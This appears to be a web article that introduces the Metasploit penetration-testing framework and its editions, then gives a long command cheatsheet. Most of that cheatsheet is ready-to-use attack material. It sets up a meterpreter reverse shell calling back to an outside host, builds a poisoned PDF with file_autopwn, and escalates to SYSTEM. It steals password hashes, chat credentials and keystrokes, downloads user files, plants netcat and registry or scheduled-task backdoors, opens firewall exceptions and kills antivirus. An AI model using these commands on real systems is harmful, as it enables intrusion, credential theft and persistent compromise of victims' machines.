What is Metasploit?
Metasploit Commands Cheatsheet
The Metasploit Project is a computer security project that provides information about security vulnerabilities and aids in penetration testing and IDS signature development. Metasploit is best known as Framework, where user can build their own tools for finding exploits in applications, Operating system and networks.
A Penetration testing tool for developing and executing exploit code against a remote target machine. Other important sub-projects include the Opcode Database, shellcode archive and related research.
Also See: Anatomy of a Cyber Attack: Beginner Hacking with Metasploit!
Metasploit interfaces
There are several interfaces for Metasploit available. The most popular are maintained by Rapid7 and Strategic Cyber LLC.
Metasploit Framework Edition
The free version. It contains a command line interface, third-party import, manual exploitation and manual brute forcing. This free version of metasploit project also includes Zenmap, a well known ports-scanner and a compiler for Ruby, the language in which this version of metasploit was written.
Metasploit Community Edition
In October 2011, Rapid7 released Metasploit Community Edition, a free, web-based user interface for Metasploit. Metasploit Community is based on the commercial functionality of the paid-for editions with a reduced set of features, including network discovery, module browsing and manual exploitation. Metasploit Community is included in the main installer.
Metasploit Express
In April 2010, Rapid7 released Metasploit Express, an open-core commercial edition for security teams who need to verify vulnerabilities. It offers a graphical user interface, integrates nmap for discovery, and adds smart bruteforcing as well as automated evidence collection.
Metasploit Pro
In October 2010, Rapid7 added Metasploit Pro, an open-core commercial Metasploit edition for penetration testers. Metasploit Pro adds onto Metasploit Express with features such as Quick Start Wizards/MetaModules, building and managing social engineering campaigns, web application testing, an advanced Pro Console, dynamic payloads for anti-virus evasion, integration with Nexpose for ad-hoc vulnerability scans, and VPN pivoting.
Armitage
Armitage is a graphical cyber attack management tool for the Metasploit Project that visualizes targets and recommends exploits. It is a free and open source network security tool notable for its contributions to red team collaboration allowing for shared sessions, data, and communication through a single Metasploit instance.[11]
Cobalt Strike
Cobalt Strike is a collection of threat emulation tools provided by Strategic Cyber LLC to work with the Metasploit Framework. Cobalt Strike includes all features of Armitage and adds post-exploitation tools, in addition to report generation features.
You can download Metasploit here
Also Read:
- Metasploit Tutorial – How To Write Auxiliary Module?
- Tutorial: XSSF In Metasploit
- VIPROY – VoIP Pen-Test Kit for Metasploit Framework
- Nettool.sh – Automate frameworks For Nmap, Driftnet, Sslstrip, Metasploit And Ettercap MITM Attacks
Metasploit Cheat sheet and Commands are as follows..
use exploit/multi/handler set PAYLOAD windows/meterpreter/reverse_tcp set LHOST rmccurdy.com set LPORT 21 set ExitOnSession false # set AutoRunScript pathto script you want to autorun after exploit is run set AutoRunScript persistence -r 75.139.158.51 -p 21 -A -X -i 30 exploit -j -z
# file_autopwn
rm -Rf /tmp/1
mkdir /tmp/1
rm -Rf ~/.msf3
wget -O /tmp/file3.pdf https://www1.nga.mil/Newsroom/PressR…s/nga10_02.pdf
./msfconsole
db_driver sqlite3
db_create pentest11
setg LHOST 75.139.158.51
setg LPORT 21
setg SRVPORT 21
setg LPORT_WIN32 21
setg INFILENAME /tmp/file3.pdf
use auxiliary/server/file_autopwn
set OUTPATH /tmp/1
set URIPATH /msf
set SSL true
set ExitOnSession false
set PAYLOAD windows/meterpreter/reverse_tcp
setg PAYLOAD windows/meterpreter/reverse_tcp
set AutoRunScript persistence -r 75.139.158.51 -p 21 -A -X -i 30
run
# shows all the scripts
run
# persistence! broken …if you use DNS name ..
run persistence -r 75.139.158.51 -p 21 -A -X -i 30
run get_pidgin_creds
idletime
sysinfo
# SYSTEM SHELL ( pick a proc that is run by system )
migrate 376
shell
# session hijack tokens
use incognito
impersonate_token “NT AUTHORITY\\SYSTEM”
# escalate to system
use priv
getsystem
execute -f cmd.exe -H -c -i -t
execute -f cmd.exe -i -t
# list top used apps
run prefetchtool -x 20
# list installed apps
run prefetchtool -p
run get_local_subnets
# find and download files
run search_dwld “%USERPROFILE%\\my documents” passwd
run search_dwld “%USERPROFILE%\\desktop passwd
run search_dwld “%USERPROFILE%\\my documents” office
run search_dwld “%USERPROFILE%\\desktop” office
# alternate
download -r “%USERPROFILE%\\desktop” ~/
download -r “%USERPROFILE%\\my documents” ~/
# alternate to shell not SYSTEM
# execute -f cmd.exe -H -c -i -t
# does some run wmic commands etc
run winenum
# rev shell the hard way
run scheduleme -m 1 -u /tmp/nc.exe -o “-e cmd.exe -L -p 8080”
# An example of a run of the file to download via tftp of Netcat and then running it as a backdoor.
run schtasksabuse-dev -t 192.168.1.7 -c “tftp -i 192.168.1.8 GET nc.exe,nc -L -p 8080 -e cmd.exe” -d 4
run schtasksabuse -t 192.168.1.7 -c “tftp -i 192.168.1.8 GET nc.exe,nc -L -p 8080 -e cmd.exe” -d 4
# vnc / port fwd for linux
run vnc
# priv esc
run kitrap0d
run getgui
# somewhat broken .. google sdt cleaner NtTerminateProcess !@?!?!
run killav
run winemun
run memdump
run screen_unlock
upload /tmp/system32.exe C:\\windows\\system32\\
reg enumkey -k HKLM\\software\\microsoft\\windows\\currentversion \\run
reg setval -k HKLM\\software\\microsoft\\windows\\currentversion \\run -v system32 -d “C:\\windows\\system32\\system32.exe -Ldp 455 -e cmd.exe”
reg queryval -k HKLM\\software\\microsoft\\windows\\currentversion \\Run -v system32
reg enumkey -k HKLM\\system\\controlset001\services\\sharedaccess \\parameters\\firewallpolicy\\Standardprofile\\aut horizedapplications\\list
reg setval -k HKLM\\system\\controlset001\services\\sharedaccess \\parameters\\firewallpolicy\\Standardprofile\\aut horizedapplications\\list -v sys
reg queryval -k HKLM\\system\\controlset001\services\\sharedaccess \\parameters\\firewallpolicy\\Standardprofile\\aut horizedapplications\\list -v system32
upload /neo/wallpaper1.bmp “C:\\documents and settings\\pentest3\\local settings\\application data\\microsoft\\”
getuid
ps
getpid
keyscan_start
keyscan_dump
migrate 520
portfwd add -L 104.4.4 -l 6666 -r 192.168.1.1 -p 80″
portfwd add -L 192.168.1.1 -l -r 10.5.5.5 -p 6666
shell
run myremotefileserver_mserver -h
run myremotefileserver_mserver -p 8787
run msf_bind
run msf_bind -p 1975
rev2self
getuid
getuid
enumdesktops
grabdesktop
run deploymsf -f framework-3.3-dev.exe
run hashdump
run metsvc
run scraper
run checkvm
run keylogrecorder
run netenum -fl -hl localhostlist.txt -d google.com
run netenum -rl -r 10.192.0.50-10.192.0.254
run netenum -st -d google.com
run netenum -ps -r 10.192.0.50-254
# Windows Login Brute Force Meterpreter Script
run winbf -h
# upload a script or executable and run it
uploadexec
# Using Payload As A Backdoor from a shell
REG add HKEY_CURRENT_USER\Software\Microsoft\Windows\Curre ntVersion\Run /v firewall /t REG_SZ /d “c:\windows\system32\metabkdr.exe” /f
at 19:00 /every:M,T,W,Th,F cmd /c start “%USERPROFILE%\metabkdr.exe”
SCHTASKS /Create /RU “SYSTEM” /SC MINUTE /MO 45 /TN FIREWALL /TR “%USERPROFILE%\metabkdr.exe” /ED 11/11/2011
# kill AV this will not unload it from mem it needs reboot or kill from memory still … Darkspy, Seem, Icesword GUI can kill the tasks
catchme.exe -K “c:\Program Files\Kaspersky\avp.exe”
catchme.exe -E “c:\Program Files\Kaspersky\avp.exe”
catchme.exe -O “c:\Program Files\Kaspersky\avp.exe” dummy